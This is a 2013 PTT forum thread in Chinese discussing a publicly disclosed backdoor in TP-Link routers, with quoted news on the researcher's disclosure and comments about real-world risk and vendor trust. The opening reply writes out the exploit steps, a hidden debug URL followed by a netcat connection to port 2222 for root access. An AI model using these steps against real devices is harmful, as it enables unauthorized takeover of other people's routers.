作者Obb (有趣的世界)
看板Broad_Band
标题Re: [情报] TP-Link 路由器发现後门
时间Sat Mar 16 14:38:57 2013
难怪美国的资讯采购坚持不用 华为设备
但我们三大电信采购买了很多... 真有种
後门进入方式
先
http://192.168.0.1/userRpmNatDebugRpm26525557/start_art.html
再nc 192.168.0.1 2222
获取TP-Link最高权限。
※ 引述《YuiFAN (半熟鱿鱼)》之铭言:
: http://www.solidot.org/story?sid=33846
: 安全研究员 Michal Sajdak 在深圳普联技术有限公司(TP-LINK)的路由器产品
: TL-WDR4300 的韧体中发现了後门漏洞,在通知普联无果後,公开了漏洞的概念
: 验证攻击代码。
: 受影响的型号包括 TL-WDR4300 和 TL-WR743ND (v1.2 / v2.0) 等,包含远程
: root 漏洞的韧体版本是去年底发布的最新版本 3.13.23 Build 122512
: (即2012年12月25日发布的版本)。Sajdak於 2月12日和22日两次向普联发去了
: 详细介绍漏洞的邮件,都没有得到任何回应,於是在3月12日公开了漏洞。
: 此漏洞的详细说明网页:
: http://sekurak.pl/tp-link-httptftp-backdoor/
--
※ 发信站: 批踢踢实业坊(ptt.cc)
※ 编辑: Obb 来自: 182.18.223.9 (03/16 14:42)
1F:推 litleaf:烂透了!!!!!!!!! 03/16 20:18
2F:推 birdy590:对一般家用户根本没有影响, 谁会把网管往外开? 03/16 21:57
3F:→ asdfghjklasd:嗯,要是有人SSID没加密路过就可以..... 03/16 23:45
4F:→ Obb:那是已公布的後门,还有许多未公布的後门~ 03/17 13:11
5F:→ Obb:to birdy590, 被发现有後门的厂牌 还会有信誉吗 03/17 13:11
6F:→ Obb: 难怪塔米欧不想再代理这牌子了 03/17 13:14
7F:推 panebhsu:我以为是塔米欧抢不赢建达。 03/17 15:38
8F:推 birdy590:你看过哪家isp的设备httpd是用户有办法试连的? 03/17 20:14
9F:推 birdy590:连cisco都被发现过不少後门 所以谁敢开就是自己找危险 03/17 20:16
10F:→ bestpika:我就不信哪家的没後门,只是刚好没被找到罢了 03/18 01:17
11F:→ bestpika:或者那些洞都是要在 LAN 底下才会有用 03/18 01:17
12F:→ bluewaterr:华为的中华机房没看到过啊... 03/19 13:06